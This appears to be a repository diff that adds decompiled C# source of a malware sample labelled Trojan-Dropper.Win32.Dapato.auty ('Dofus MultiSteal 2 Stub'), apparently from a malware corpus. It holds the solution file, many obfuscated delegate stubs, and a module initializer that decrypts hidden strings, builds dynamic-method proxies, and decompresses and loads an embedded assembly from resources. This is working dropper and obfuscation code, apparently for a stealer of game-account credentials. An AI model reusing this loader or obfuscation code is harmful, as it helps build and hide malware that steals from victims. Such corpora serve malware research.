<Compile Include="뺿㇞姦䢮ᆯ♠䣪.cs" />
<Compile Include="뛺쪚䎣㋃鳩.cs" />
<Compile Include="酸ﯧ漫뷻ᓲ뺨㛦ࡤ.cs" />
<Compile Include="桾抉㴋揙쯽ᒑ됽.cs" />
<Compile Include="ﺛ嶀〕❤ྵ≝泐.cs" />
<Compile Include="╍秀骒豜㤨灮燃.cs" />
<Compile Include="㦭拌䕿퉲뉗병.cs" />
<Compile Include="랷䧥ல敦纲.cs" />
<Compile Include="桢㷪経쁠䵲ᐃﲚ.cs" />
<Compile Include="ᛝ䥿裲倈넹.cs" />
<Compile Include="秓婦쮓䑌変ꌁ鋻.cs" />
<Compile Include="禵좋Ǐ蓸俈俍贖䕘.cs" />
<Compile Include="⮧酫▭ᜎ⧚䖶.cs" />
<Compile Include="詪ꌦ⑑࢖ᱯバⶌ䓊.cs" />
<Compile Include="
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/Trojan-Dropper.Win32.Dapato.auty.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Dofus MultiSteal 2 Stub", "Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.csproj", "{30FAD7D2-E440-4280-8F2A-9CB3AEA33643}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{30FAD7D2-E440-4280-8F2A-9CB3AEA33643}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{30FAD7D2-E440-4280-8F2A-9CB3AEA33643}.Debug|Any CPU.Build.0 = Debug|Any CPU
{30FAD7D2-E440-4280-8F2A-9CB3AEA33643}.Release|Any CPU.ActiveCfg = Release|Any CPU
{30FAD7D2-E440-4280-8F2A-9CB3AEA33643}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/_003CModule_003E.cs
+193
View File
@@ -0,0 +1,193 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Reflection.Emit;
using System.Text;
internal class \u003CModule\u003E
{
static \u003CModule\u003E()
{
\u27DB礡\u2729ꏯ隨䫖\uFFFD킎.\uF296\u2595ꗫ燞\uFFDDﹱ蔙();
AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\u003CModule\u003E.\u0003\uFFFD\uFFFD\uFFFD\u0027Q\uFFFDN\uFFFD\uFFFD\uFFFDN\uFFFD\uFFFD\u001A\uFFFD);
\u192E\uF515\uFFFD\u3347䡯運ப.\u2100䦀簴Ṽ芹();
}
internal static object G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(
uint id)
{
if (!(AppDomain.CurrentDomain.GetData("G7z],\u001A") is Dictionary<uint, object> dictionary))
{
AppDomain.CurrentDomain.SetData("G7z],\u001A", (object) (dictionary = new Dictionary<uint, object>()));
MemoryStream memoryStream = new MemoryStream();
using (DeflateStream deflateStream = new DeflateStream(Assembly.GetCallingAssembly().GetManifestResourceStream("G7z],\u001A"), CompressionMode.Decompress))
{
byte[] buffer = new byte[4096];
int count = deflateStream.Read(buffer, 0, 4096);
do
{
memoryStream.Write(buffer, 0, count);
count = deflateStream.Read(buffer, 0, 4096);
}
while (count != 0);
}
AppDomain.CurrentDomain.SetData("~m9eYWT", (object) memoryStream.ToArray());
}
uint num1 = 210013081U ^ (uint) new StackFrame(1).GetMethod().MetadataToken;
uint num2 = 1313548208;
uint num3 = 2037355434;
for (uint index = 1; index <= 64U; ++index)
{
num1 = (uint) (((int) num1 & 16777215) << 8) | (num1 & 4278190080U) >> 24;
uint num4 = (num1 & (uint) byte.MaxValue) % 64U;
if (num4 >= 0U && num4 < 16U)
{
num2 |= (uint) ((int) ((num1 & 65280U) >> 8) & (int) ((num1 & 16711680U) >> 16) ^ ~(int) num1 & (int) byte.MaxValue);
num3 ^= (uint) ((int) num1 * (int) index + 1) % 16U;
num1 += (uint) (((int) num2 | (int) num3) ^ 2006291989);
}
else if (num4 >= 16U && num4 < 32U)
{
num2 ^= (uint) (((int) num1 & 16711935) << 8 ^ ((int) ((num1 & 16776960U) >> 8) | ~(int) num1 & (int) ushort.MaxValue));
num3 += num1 * index % 32U;
num1 |= (uint) ((int) num2 + ~(int) num3 & 2006291989);
}
else if (num4 >= 32U && num4 < 48U)
{
num2 += (uint) (((int) num1 & (int) byte.MaxValue | (int) ((num1 & 16711680U) >> 16)) + (~(int) num1 & (int) byte.MaxValue));
num3 -= (uint) ~((int) num1 + (int) num4) % 48U;
num1 ^= num2 % num3 | 2006291989U;
}
else if (num4 >= 48U && num4 < 64U)
{
num2 ^= (uint) (((int) ((num1 & 16711680U) >> 16) | ~((int) num1 & (int) byte.MaxValue)) * (~(int) num1 & 16711680));
num3 += (num1 ^ index - 1U) % num4;
num1 -= (uint) (~((int) num2 ^ (int) num3) + 2006291989);
}
}
uint num5 = num1 ^ id;
object obj;
if (!dictionary.TryGetValue(num5, out obj))
{
using (BinaryReader binaryReader = new BinaryReader((Stream) new MemoryStream((byte[]) AppDomain.CurrentDomain.GetData("~m9eYWT"))))
{
binaryReader.BaseStream.Seek((long) num5, SeekOrigin.Begin);
byte num6 = binaryReader.ReadByte();
byte[] bytes = binaryReader.ReadBytes(binaryReader.ReadInt32());
Random random = new Random(2006291989 ^ (int) num5);
byte[] numArray = new byte[bytes.Length];
random.NextBytes(numArray);
BitArray bitArray = new BitArray(bytes);
bitArray.Xor(new BitArray(numArray));
bitArray.CopyTo((Array) bytes, 0);
switch (num6)
{
case 36:
obj = (object) BitConverter.ToSingle(bytes, 0);
break;
case 54:
obj = (object) Encoding.UTF8.GetString(bytes);
break;
case 85:
obj = (object) BitConverter.ToInt32(bytes, 0);
break;
case 93:
obj = (object) BitConverter.ToDouble(bytes, 0);
break;
case 129:
obj = (object) BitConverter.ToInt64(bytes, 0);
break;
}
dictionary[num5] = obj;
}
}
return obj;
}
internal static void \u2A14쒗ൾ甒ᵾⲘṀ贈(RuntimeFieldHandle f)
{
FieldInfo fieldFromHandle = FieldInfo.GetFieldFromHandle(f);
Assembly executingAssembly = Assembly.GetExecutingAssembly();
char[] chArray = new char[fieldFromHandle.Name.Length];
for (int index = 0; index < chArray.Length; index++)
chArray[index] = (char) ((int) (byte) fieldFromHandle.Name[index] ^ index);
ConstructorInfo con = executingAssembly.GetModules()[0].ResolveMethod(BitConverter.ToInt32(Convert.FromBase64String(new string(chArray)), 0) ^ 1762333708) as ConstructorInfo;
ParameterInfo[] parameters = con.GetParameters();
Type[] parameterTypes = new Type[parameters.Length];
for (int index = 0; index < parameters.Length; index++)
parameterTypes[index] = parameters[index].ParameterType;
DynamicMethod dynamicMethod = new DynamicMethod("", con.DeclaringType, parameterTypes, con.DeclaringType, true);
ILGenerator ilGenerator = dynamicMethod.GetILGenerator();
for (int index = 0; index < parameterTypes.Length; index++)
ilGenerator.Emit(OpCodes.Ldarg_S, index);
ilGenerator.Emit(OpCodes.Newobj, con);
ilGenerator.Emit(OpCodes.Ret);
fieldFromHandle.SetValue((object) null, (object) dynamicMethod.CreateDelegate(fieldFromHandle.FieldType));
}
internal static void (RuntimeFieldHandle f)
{
FieldInfo fieldFromHandle = FieldInfo.GetFieldFromHandle(f);
Assembly executingAssembly = Assembly.GetExecutingAssembly();
char[] chArray = new char[fieldFromHandle.Name.Length];
for (int index = 0; index < chArray.Length; ++index)
chArray[index] = (char) ((int) (byte) fieldFromHandle.Name[index] ^ index);
byte[] numArray = Convert.FromBase64String(new string(chArray));
MethodInfo methodInfo = executingAssembly.GetModules()[0].ResolveMethod(BitConverter.ToInt32(numArray, 1) ^ 78618627) as MethodInfo;
if (methodInfo.IsStatic)
{
fieldFromHandle.SetValue((object) null, (object) Delegate.CreateDelegate(fieldFromHandle.FieldType, methodInfo));
}
else
{
ParameterInfo[] parameters = methodInfo.GetParameters();
Type[] parameterTypes = new Type[parameters.Length + 1];
parameterTypes[0] = typeof (object);
for (int index = 0; index < parameters.Length; ++index)
parameterTypes[index + 1] = parameters[index].ParameterType;
DynamicMethod dynamicMethod = !methodInfo.DeclaringType.IsInterface ? new DynamicMethod("", methodInfo.ReturnType, parameterTypes, methodInfo.DeclaringType, true) : new DynamicMethod("", methodInfo.ReturnType, parameterTypes, (Type) null, true);
ILGenerator ilGenerator = dynamicMethod.GetILGenerator();
for (int index = 0; index < parameterTypes.Length; ++index)
{
ilGenerator.Emit(OpCodes.Ldarg, index);
if (index == 0)
ilGenerator.Emit(OpCodes.Castclass, methodInfo.DeclaringType);
}
ilGenerator.Emit(numArray[0] == (byte) 13 ? OpCodes.Callvirt : OpCodes.Call, methodInfo);
ilGenerator.Emit(OpCodes.Ret);
fieldFromHandle.SetValue((object) null, (object) dynamicMethod.CreateDelegate(fieldFromHandle.FieldType));
}
}
internal static Assembly \u0003\uFFFD\uFFFD\uFFFD\u0027Q\uFFFDN\uFFFD\uFFFD\uFFFDN\uFFFD\uFFFD\u001A\uFFFD(
object sender,
ResolveEventArgs args)
{
if (!(AppDomain.CurrentDomain.GetData("NGS9\u0016J\u00101\u001Cr") is Assembly data))
{
using (BinaryReader binaryReader1 = new BinaryReader((Stream) new DeflateStream(typeof (\u003CModule\u003E).Assembly.GetManifestResourceStream("NGS9\u0016J\u00101\u001Cr"), CompressionMode.Decompress)))
{
byte[] numArray = binaryReader1.ReadBytes(binaryReader1.ReadInt32());
byte[] buffer = new byte[numArray.Length / 2];
for (int index = 0; index < numArray.Length; index += 2)
buffer[index / 2] = (byte) (((int) numArray[index + 1] ^ 33) * 33 + ((int) numArray[index] ^ 33));
using (BinaryReader binaryReader2 = new BinaryReader((Stream) new DeflateStream((Stream) new MemoryStream(buffer), CompressionMode.Decompress)))
{
data = Assembly.Load(binaryReader2.ReadBytes(binaryReader2.ReadInt32()));
AppDomain.CurrentDomain.SetData("NGS9\u0016J\u00101\u001Cr", (object) data);
}
}
}
return Array.IndexOf<string>(data.GetManifestResourceNames(), args.Name) == -1 ? (Assembly) null : data;
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/n++OºüOôáe¡ín++ߦùn++µ+è.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ￿꧁ꓠ
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
internal delegate \u254D秀\uEB37骒豜㤨灮燃 \uFFFF\uA9C1\uEB61\uFFFDẗ\uFFFD漊();
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/Ɩ셞㪺鉲姌ﶧ抲.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: Ɩ셞㪺鉲姌ﶧ抲
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Drawing;
internal delegate Graphics Ɩ\uEDB2(Image _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ɹ톮o痍ᅤ.cs
+82
View File
@@ -0,0 +1,82 @@
// Decompiled with JetBrains decompiler
// Type: ɹ톮o痍ᅤ
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
[StandardModule]
internal sealed class ɹ\uF786톮\uF6FC\uF300痍ᅤ
{
private static void \uF5C6\uE836ꐜ狼ꯌ꧑㟔葮()
{
double num1 = 191922.0;
double num2 = 68.0;
int num3 = 45420784;
int num4 = 20763;
int num5 = 329735935;
while (num5 <= 9542906)
{
num2 = 59.0;
string str = (string) \u003CModule\u003E.G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(2046294928U);
checked { ++num5; }
}
Decimal num6 = \uE4C9֛薍\uF776\u203D틴攝.\uE296ꇰ\uE723茹뉁Ỗ(8725469L);
long num7 = 750687718;
int num8 = 272942;
do
{
num3 = 2566289;
\uE4C9֛薍\uF776\u203D틴攝.\uE296ꇰ\uE723茹뉁Ỗ(89896560L);
checked { ++num8; }
}
while (num8 <= 6736467);
Decimal num9 = \uE4C9֛薍\uF776\u203D틴攝.\uE296ꇰ\uE723茹뉁Ỗ(31L);
int num10 = (int) \uE240덖ဵ虔憎.\uFFFD䏐ꖮ\u09A9幮䵋痱ᶬ((string) \u003CModule\u003E.G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(2046294915U));
num9 = \uE4C9֛薍\uF776\u203D틴攝.\uE296ꇰ\uE723茹뉁Ỗ(323L);
num9 = \uE4C9֛薍\uF776\u203D틴攝.\uE296ꇰ\uE723茹뉁Ỗ(7901289L);
string str1 = (string) \u003CModule\u003E.G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(2046294892U);
num6 = \uE4C9֛薍\uF776\u203D틴攝.\uE296ꇰ\uE723茹뉁Ỗ(340607L);
num3 = 4;
bool flag = false;
string str2 = (string) \u003CModule\u003E.G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(2046294208U);
int num11 = (int) \uE240덖ဵ虔憎.\uFFFD䏐ꖮ\u09A9幮䵋痱ᶬ((string) \u003CModule\u003E.G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(2046294105U));
string str3 = (string) \u003CModule\u003E.G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(2046294384U);
flag = true;
Decimal num12 = 1M;
int num13 = (int) \uE240덖ဵ虔憎.\uFFFD䏐ꖮ\u09A9幮䵋痱ᶬ((string) \u003CModule\u003E.G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(2046295679U));
flag = false;
num1 = 6139.0;
num9 = \uE4C9֛薍\uF776\u203D틴攝.\uE296ꇰ\uE723茹뉁Ỗ(78214L);
flag = true;
num4 = 2;
Decimal num14 = \uE4C9֛薍\uF776\u203D틴攝.\uE296ꇰ\uE723茹뉁Ỗ(20L);
num7 = 9567624L;
num2 = 66.0;
num7 = 6152225L;
num12 = \uE4C9֛薍\uF776\u203D틴攝.\uE296ꇰ\uE723茹뉁Ỗ(793L);
str3 = (string) \u003CModule\u003E.G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(2046296042U);
num14 = \uE4C9֛薍\uF776\u203D틴攝.\uE296ꇰ\uE723茹뉁Ỗ(37960L);
num12 = \uE4C9֛薍\uF776\u203D틴攝.\uE296ꇰ\uE723茹뉁Ỗ(464L);
num9 = \uE4C9֛薍\uF776\u203D틴攝.\uE296ꇰ\uE723茹뉁Ỗ(12L);
int num15 = 11547011;
num4 = 71481633;
num15 = 533022;
str1 = (string) \u003CModule\u003E.G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(2046296019U);
int num16 = (int) .ո\u4DE9ꀡ꽽((object) (string) \u003CModule\u003E.G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(2046295869U), MsgBoxStyle.OkOnly, (object) null);
}
private static void \uF353飳襮쬭()
{
int num = (int) .ո\u4DE9ꀡ꽽((object) (string) \u003CModule\u003E.G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(2861487421U), MsgBoxStyle.OkOnly, (object) null);
}
public static object \u297Cᩀ굪뼱퓻裠\uF204짥()
{
int num = (int) .ո\u4DE9ꀡ꽽((object) (string) \u003CModule\u003E.G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(2941637756U), MsgBoxStyle.OkOnly, (object) null);
return (object) 69610;
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/Ϝ묓ෆ睩떇ⶤ낽.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: Ϝ묓ෆ睩떇ⶤ낽
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
internal delegate string Ϝ\uEBDD낽(char[] _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/Գ䢽Ქ؈ꨥ鿪ઉ.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: Գ䢽Ქ؈ꨥ鿪ઉ
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Reflection;
using System.Runtime.InteropServices;
internal delegate Module[] Գ\u1CA5\u0608\uE96Dꨥ\u9FEAઉ([In] object obj0);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/Թꡒ궖軥懵恋꥕.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: Թꡒ궖軥懵恋꥕
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Security.Cryptography;
internal delegate RNGCryptoServiceProvider Թ\uEBB9\uA955();
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/׃趪돟⨴ᝰ掸涽.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ׃趪돟⨴ᝰ掸涽
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Runtime.InteropServices;
internal delegate string \u05C3趪돟\u2A34ᝰ掸\uF228涽([In] object obj0);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ٽ惀젛㞫紼倵嶒.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ٽ惀젛㞫紼倵嶒
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
internal delegate object ٽ\uECD1倵嶒(object _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ޮ㼽ᓭⶮ婭亡쳤捳.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ޮ㼽ᓭⶮ婭亡쳤捳
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.ComponentModel;
internal delegate BackgroundWorker \u07AE㼽ᓭⶮ婭亡쳤捳();
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ࠬ�㘨ቕﳠ໻蓩.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ࠬ㘨ቕﳠ໻蓩
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Runtime.InteropServices;
internal delegate string \u082C\uFFFD㘨ቕﳠ\uEA64\u0EFB蓩([In] object obj0, string _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ࡌ去홅갂퉸猅庨応.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ࡌ去홅갂퉸猅庨応
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
internal delegate ɉ. ();
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ࡌ�ਭ䥑騌䌈ᜤ㮓.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: ࡌਭ䥑騌䌈ᜤ㮓
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Runtime.InteropServices;
internal delegate void \uFFFDਭ䥑騌䌈ᜤ㮓([In] object obj0, object _param2, object _param3);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/घ럀砬㾣延휫万㞰.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: घ럀砬㾣延휫万㞰
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Runtime.InteropServices;
internal delegate bool ([In] object obj0, object _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ଡ틵扑鈳ꉞ結.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ଡ틵扑鈳ꉞ結
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
internal delegate bool \uF4C3틵\uE856扑鈳ꉞ結(string _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ൂ첁徽⤞蛴㯘⭃.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: ൂ첁徽⤞蛴㯘⭃
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
internal delegate \uE78C䧥ல\uEC60敦\uE514纲 \u0D42첁徽\u291E蛴\uE840㯘\u2B43();
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/༺ꘇ틤\䖮㇑槻阽.cs
+13
View File
@@ -0,0 +1,13 @@
// Decompiled with JetBrains decompiler
// Type: ༺ꘇ틤\䖮㇑槻阽
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System.Runtime.InteropServices;
using System.Security.Cryptography;
internal delegate ICryptoTransform \u0F3Aꘇ틤\uFF3C䖮\u31D1槻阽(
[In] object obj0,
byte[] _param2,
byte[] _param3);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ᆔኾꗘ몇砍섕뢅㋐.cs
+10
View File
@@ -0,0 +1,10 @@
